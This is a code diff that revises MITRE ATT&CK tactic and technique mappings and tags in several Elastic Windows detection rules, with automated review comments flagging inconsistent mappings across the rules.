@@ -123,27 +108,25 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" 
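Review bot: T1566.001 / Initial Access is removed from the Office child-process rule in this hunk, while the Outlook child-process sibling further down in this diff re-adds the same T1566.001 / Initial Access entry next to the identical T1204.002 mapping. Both rules detect the same post-delivery behaviour — an Office application spawning a child process — so one of the two treatments appears inconsistent; either drop Phishing from the Outlook rule as well or restore it here. The policy being applied (map only the observed execution, or also the presumed delivery) should be stated once in the PR description so the remaining patches in the series follow the same rule.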
@@ -154,22 +137,27 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml b/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml index c0828b44e66..c00264926f5 100644 --- a/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml +++ b/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -75,22 +75,7 @@ This rule looks for suspicious processes spawned by MS Outlook, which can be the risk_score = 21 rule_id = "32f4675e-6c49-4ace-80f9-97c9259dca2e" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Windows Security Event Logs", - "Data Source: Crowdstrike", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Data Source: Sysmon"] timestamp_override = "event.ingested" type = "eql" 
@@ -110,53 +95,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" [[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - - +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" 
diff --git a/rules/windows/initial_access_suspicious_windows_server_update_svc.toml b/rules/windows/initial_access_suspicious_windows_server_update_svc.toml index c1bfe3cbe84..d60b1c1c4fa 100644 --- a/rules/windows/initial_access_suspicious_windows_server_update_svc.toml +++ b/rules/windows/initial_access_suspicious_windows_server_update_svc.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/24" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/10/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,19 +58,7 @@ references = [ risk_score = 73 rule_id = "1ac027c2-8c60-4715-af73-927b9c219e20" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -86,22 +74,30 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -112,10 +108,7 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/initial_access_url_cve_2025_33053.toml b/rules/windows/initial_access_url_cve_2025_33053.toml index 17c356f8d2c..2f44d1c7787 100644 --- a/rules/windows/initial_access_url_cve_2025_33053.toml +++ b/rules/windows/initial_access_url_cve_2025_33053.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/11" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/06/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
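Review bot: T1190 / Initial Access is removed entirely from this rule in `@@ -86,22 +74,30 @@` and replaced with T1218.011, yet the two Exchange rules earlier in the diff (initial_access_suspicious_ms_exchange_files and …_worker_child_process) keep T1190 for the same detection shape — a public-facing service writing or spawning suspicious artifacts after exploitation. Unless the WSUS rule is deliberately scoped differently, one of the two treatments misreports coverage; keep T1190 here or drop it from the Exchange rules as well. The rule's name and `references` are not touched in this diff, so if they still describe exploitation of an exposed update service the prose and the mapping now disagree.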
@@ -52,19 +52,7 @@ references = [ risk_score = 73 rule_id = "5e23495f-09e2-4484-8235-bdb150d698c9" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -84,37 +72,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" +id = "T1574.008" +name = "Path Interception by Search Order Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/008/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - - - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml b/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml index 7a7e8c67522..f5e2aeffe12 100644 --- a/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml +++ b/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/10/29" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -60,20 +60,7 @@ Windows Explorer, a core component of the Windows OS, manages file and folder na risk_score = 47 rule_id = "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -96,63 +83,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" [[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - - +id = "T1559.001" +name = "Component Object Model" +reference = "https://attack.mitre.org/techniques/T1559/001/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = 
"Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/initial_access_webshell_screenconnect_server.toml b/rules/windows/initial_access_webshell_screenconnect_server.toml index fbe76f594f5..1b5936dcd82 100644 --- a/rules/windows/initial_access_webshell_screenconnect_server.toml +++ b/rules/windows/initial_access_webshell_screenconnect_server.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/26" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -92,22 +92,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" 
@@ -118,10 +108,20 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/windows/initial_access_xsl_script_execution_via_com.toml b/rules/windows/initial_access_xsl_script_execution_via_com.toml index 2a1b8903abd..9b08ea6268f 100644 --- a/rules/windows/initial_access_xsl_script_execution_via_com.toml +++ b/rules/windows/initial_access_xsl_script_execution_via_com.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -18,15 +18,7 @@ name = "Remote XSL Script Execution via COM" risk_score = 21 rule_id = "48f657ee-de4f-477c-aa99-ed88ee7af97a" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' 
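Review bot: This file section changes the `[[rule.threat]]` entries (Execution now first, Initial Access re-added in this hunk) but contains no `tags` hunk, so the tags cannot be checked against the new mapping from the diff alone; they must list exactly `Tactic: Execution` and `Tactic: Initial Access` for this file to be brought into the same tags/threat agreement as every other rule in the series. The same gap exists for lateral_movement_dcom_hta near the end of the diff, where Defense Evasion / T1218.005 is removed without a tags hunk — if its tags still carry `Tactic: Defense Evasion`, that tag is now orphaned. Worth confirming both files rather than assuming the prior tags were already correct.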
@@ -82,31 +74,31 @@ The Microsoft.XMLDOM COM interface allows applications to parse and transform XM [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1220" name = "XSL Script Processing" reference = "https://attack.mitre.org/techniques/T1220/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" + +[[rule.threat.technique.subtechnique]] +id = "T1559.001" +name = "Component Object Model" +reference = "https://attack.mitre.org/techniques/T1559/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/lateral_movement_alternate_creds_pth.toml b/rules/windows/lateral_movement_alternate_creds_pth.toml index 1e5bd39b62b..7ea89b9a9da 100644 --- a/rules/windows/lateral_movement_alternate_creds_pth.toml +++ b/rules/windows/lateral_movement_alternate_creds_pth.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/29" integration = ["windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -55,14 +55,7 @@ references = ["https://attack.mitre.org/techniques/T1550/002/"] risk_score = 47 rule_id = "daafdf96-e7b1-4f14-b494-27e0d24b11f6" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Lateral Movement", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -76,22 +69,39 @@ user.id : (S-1-5-21-* or S-1-12-1-*) and winlog.event_data.LogonProcessName : "s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.002" name = "Pass the Hash" reference = "https://attack.mitre.org/techniques/T1550/002/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.002" +name = "Pass the Hash" +reference = "https://attack.mitre.org/techniques/T1550/002/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - [rule.new_terms] field = "new_terms_fields" value = ["user.id"] diff --git a/rules/windows/lateral_movement_cmd_service.toml b/rules/windows/lateral_movement_cmd_service.toml index 3e17c1558a3..580a36e40c5 100644 --- a/rules/windows/lateral_movement_cmd_service.toml +++ b/rules/windows/lateral_movement_cmd_service.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,15 +57,7 @@ The Service Control Manager in Windows allows for the management of services, wh risk_score = 21 rule_id = "d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] type = "eql" query = ''' 
@@ -80,48 +72,49 @@ sequence by process.entity_id with maxspan = 1m [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" -[[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml b/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml index ecce43b56cd..698eebfb106 100644 --- a/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml 
+++ b/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/28" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/12/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,20 +64,7 @@ references = [ risk_score = 73 rule_id = "c6b40f4c-c6a9-434e-adb8-989b0d06d005" severity = "high" -tags = [ - "Domain: Endpoint", - "Domain: Identity", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Lateral Movement", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "Domain: Identity", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Credential Access", "Data Source: Active Directory", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -99,33 +86,11 @@ sequence by source.port, source.ip with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" -[[rule.threat.technique.subtechnique]] -id = "T1550.003" -name = "Pass the Ticket" -reference = "https://attack.mitre.org/techniques/T1550/003/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" -[[rule.threat.technique.subtechnique]] -id = "T1558.003" -name = "Kerberoasting" -reference = "https://attack.mitre.org/techniques/T1558/003/" - - [rule.threat.tactic] id = "TA0006" diff --git a/rules/windows/lateral_movement_dcom_hta.toml b/rules/windows/lateral_movement_dcom_hta.toml index 4f7be9dafd2..4df87d44b05 100644 --- a/rules/windows/lateral_movement_dcom_hta.toml +++ b/rules/windows/lateral_movement_dcom_hta.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
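Review bot: With the Lateral Movement entry (T1550.003) removed, this rule's only remaining tactic is Credential Access, yet its path `rules/windows/lateral_movement_credential_access_kerberos_correlation.toml` still carries the lateral_movement_ prefix; if that prefix is used for triage or navigation in this repo, a rename or a sentence in the PR description explaining the re-scoping would help. The same applies to `rules/windows/lateral_movement_unusual_dns_service_file_writes.toml` further down, whose sole tactic becomes Initial Access. The T1558.003 Kerberoasting sub-technique is also dropped, narrowing the mapping to the parent T1558; the query is outside the hunk, so confirm the sequence no longer correlates the Kerberoasting-specific events before shipping the narrower mapping.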
@@ -85,36 +85,18 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.003" name = "Distributed Component Object Model" reference = "https://attack.mitre.org/techniques/T1021/003/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" -[[rule.threat.technique.subtechnique]] -id = "T1218.005" -name = "Mshta" -reference = "https://attack.mitre.org/techniques/T1218/005/" - - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/lateral_movement_dcom_mmc20.toml b/rules/windows/lateral_movement_dcom_mmc20.toml index edec6ac25c0..e90ad419cc3 100644 --- a/rules/windows/lateral_movement_dcom_mmc20.toml +++ b/rules/windows/lateral_movement_dcom_mmc20.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
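Review bot: The Defense Evasion entry (T1218.005 Mshta) is removed here without a matching change to the rule's `tags` list, which does not appear in this diff; if that list still contains `"Tactic: Defense Evasion"`, the tag/tactic consistency test added in this PR will report it as a tag with no backing threat entry. Every other file in this chunk that drops a tactic also edits `tags` in the same diff, so the omission may simply mean the tag was never present, but it is worth confirming against the file.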
